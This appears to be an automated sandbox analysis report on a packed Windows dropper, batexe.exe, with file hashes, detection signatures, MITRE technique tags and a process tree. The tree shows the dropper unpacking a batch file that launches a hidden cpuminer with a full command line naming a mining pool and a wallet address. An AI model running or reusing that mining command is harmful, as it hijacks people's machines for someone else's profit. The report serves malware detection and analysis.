73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
306s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12-02-2024 16:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4600	b2e.exe
4996	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4296-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4296 wrote to memory of 4600	4296	batexe.exe	73
PID 4296 wrote to memory of 4600	4296	batexe.exe	73
PID 4296 wrote to memory of 4600	4296	batexe.exe	73
PID 4600 wrote to memory of 4432	4600	b2e.exe	74
PID 4600 wrote to memory of 4432	4600	b2e.exe	74
PID 4600 wrote to memory of 4432	4600	b2e.exe	74
PID 4432 wrote to memory of 4996	4432	cmd.exe	77
PID 4432 wrote to memory of 4996	4432	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4296
- C:\Users\Admin\AppData\Local\Temp\1D66.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1D66.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1D66.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\244C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1D66.tmp\b2e.exe

Filesize
1.1MB

MD5
c8ddb9a1b99b955d28ce987616dc783a

SHA1
6a50a41aac042de84cbe5fe9cfa8ef171c1a15ba

SHA256
d42d045c7eaec84a0576fa2d1e67566cd65686605e6f66217c2da6ec9faa060a

SHA512
8804aa717bb5d9a88543175afd4ed3363ae6d1ff9846379f9bbfb7ff1b49cf0031fd6b1cbb0b1491a94d1158663021c8bf56c47050f3192b62a0c5bb5499d397

Download Submit
C:\Users\Admin\AppData\Local\Temp\1D66.tmp\b2e.exe

Filesize
2.1MB

MD5
099e18cf84312ee05add20eaed01b2c0

SHA1
3aedb8f0362d50274ec7bf1e79bbd3923b47cc13

SHA256
8856beb3ce39073034ad1cd1b72251224cbe3b2861af9086947470096666312c

SHA512
70c26948eecb460a2c035d8bec9f100588244a0c621fe26c13826bef00464051b54e200abfd73cb07bbe76c6c807317dc90b4974a739be718e37aa2621c134ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\244C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
626KB

MD5
623c5177c359bd42eff5093ce4ea6bff

SHA1
3f2d9032c1211b0f8a63d025f4877f1319212055

SHA256
8c5a14702c138718e6a04f6f9919d40b11795f5551d22da6d104688bf53607cc

SHA512
73519a2979e79b1e22e149675fa4cfa0ca4a4766cba1f25e5da31a8085cb4c140a916b31734c2711a0bffd44903319841b5fe88ad4f6b3369cb1850e6ead3a8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
542KB

MD5
c97e2ef8afb114358316dac109e4c35f

SHA1
f45de406941864ed8dad881161f77f57e2b2d7de

SHA256
f9f6a1651aa3e7da305f28debb922ce6009ef07d7c2ab35a3cde4edddc674b3b

SHA512
3c49af9bc5b5f3545f7c15f7951e9f5c00f822078d429b439d2daf75e949f03a11b299907fa00e2ba4351bbbdbff866856f334aa9b9739235b0afee8bc1dcfca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
755KB

MD5
bd02d92d9024111171b40d43a2536972

SHA1
f1154250b5bed58aecbd918f44a43c3c37ec0dab

SHA256
3bb737a7c17383f23c44ef1083fc71de054d0154dcec945a4c45d1464dd403f4

SHA512
9d57c4270d1776f87c7ee3a7eada003c4ca88b1a2ec5b333fddb41f6523f882ba565c1e72fe3a156da70eb3372709dad0ffe42ffbfe029ce321c147eb906b1a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
554KB

MD5
df9f3ed5aef9a78b890a7986e3f68eeb

SHA1
83ad2e5c00f8ce6866e1846611889aa8adf69372

SHA256
5641f07ea5b263d5d936a4b516bb98ab7f6e59eb18afc8b11b61ee1cba04406a

SHA512
9530600ffc5fb12182ebd86ad073a3552d3355d359fbd5b312fa6c0ad6fd9d584529d8b753fe295de322bdec0e903b3a11e992e535ed606e934931d416cf4e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
879KB

MD5
78ecdb21d34522fd634ebb050bf8d548

SHA1
d4bf1d3b8419617f38ca8cae8103a5d31f673e10

SHA256
afee9b911c69cbb830d8800f2f2d030912e2bbb810787409855824cdb1af8864

SHA512
421fbf7e087cbd344bfb8883ed32e37ce85241142078d033cc84012ea90da0de9d1f6d0dad431d02a30f8d745fb41cb78b3669163b73c5f4ff46a6015daf2db7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
484KB

MD5
3fa98a15ba01eb3ed29e51c57ec6aab4

SHA1
0d34a58e8e498df88ce4e56e2e2a985b40b342f3

SHA256
2a9949ac4e72e1ac357d3527f3d18200d91f479fc6f2229f6eab29d0688b64e0

SHA512
43c54412458a90189793d1bdbd29e9aeeb95dcac60743f01c7e61b3ea69e9d6d925c7eaaea6ff6ce906bbdae5e79544c7849542b8d52e2a0538ef7d0b392e4a2

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
804KB

MD5
ba8240851ecc3213d92ca2ab3f759552

SHA1
03a2d041b0cb2252965dbcb84f53040d71a2cf15

SHA256
151b7b0eb5f1a5a52891b65515826917b6e7c313977132c3d30397bc4862a00a

SHA512
a2d1fd597f64205012002423b0b316a3c40724e2d6cdf5686437b45fb917934e4c6baae7b5f04ee2d4884adc7532ba5758d8c716e7763bf36fbb7befcc5a73bf

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
583KB

MD5
880d22f3de6c3c62e764bd061727c356

SHA1
e9c38d797b41a39ff1c7a770d2d7828b991bb4ec

SHA256
a3e6e695cd3e92008d859b108fc7a3252dcf733843d6e92731b959bfda5790cf

SHA512
acd07b2bcaf266ff9fbe54595149f8aa3b9c57e0744da8d45936b389820973385615594c7632fc36582c3f7e6a4706c0d803b76e3d5c0aef96429fcdf638c3a3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
618KB

MD5
1fd48fd7b7a60cbc1a1e9f069f66fc75

SHA1
ea47a00566caf59d9735d34f7ab1462b92fb9ec4

SHA256
edc432f5d61462302264dd906592730f0afcbc9955d64affebc931cf47324a99

SHA512
15dc12a9a2bd520f5cb85c44d47d7364282a037af59c7e4403a764d1d8cfa2302de9cc8eb1744e55f57e8da51f04112cc9e3293f24f02bd1f7c261b3c819ddea

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
623KB

MD5
316c3ea11fbde0352f0043511cad00ba

SHA1
07fc2feb8ef14e337a6d6c65df4a5004999bdaa1

SHA256
f79a610a463d26ed795240c02ecc6a4b3c4f971be22a33047b470b3f166f010e

SHA512
029e18ec88535843ff74ff30b0a679201e61490ad8c89dba230af9b64646175f5133ba4ddfaea45bef6402dbb304696b5ccd48f6a49b7771b2858587ca9b8cc4

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
483KB

MD5
cf6e59a8b78c06a49aa9086c096152bc

SHA1
6ce8fa27e5a56f10a8533e06a634bf1dc9661b7c

SHA256
e935071d56a3d93a3a58ca8a784b420e2273e5e13c8f7fb24610630a2a0f5df6

SHA512
6b1957fca1f2960cf78d459caba486037cdb24f9497ae865b1f0b63dde43d617d0e085786700bb98cb90da3cf41f4c0664384f281aea06ae616e23273f6dc621

Download Submit
memory/4296-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4600-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4600-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4996-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4996-43-0x00000000505A0000-0x0000000050638000-memory.dmp

Filesize
608KB

Download
memory/4996-44-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/4996-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4996-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download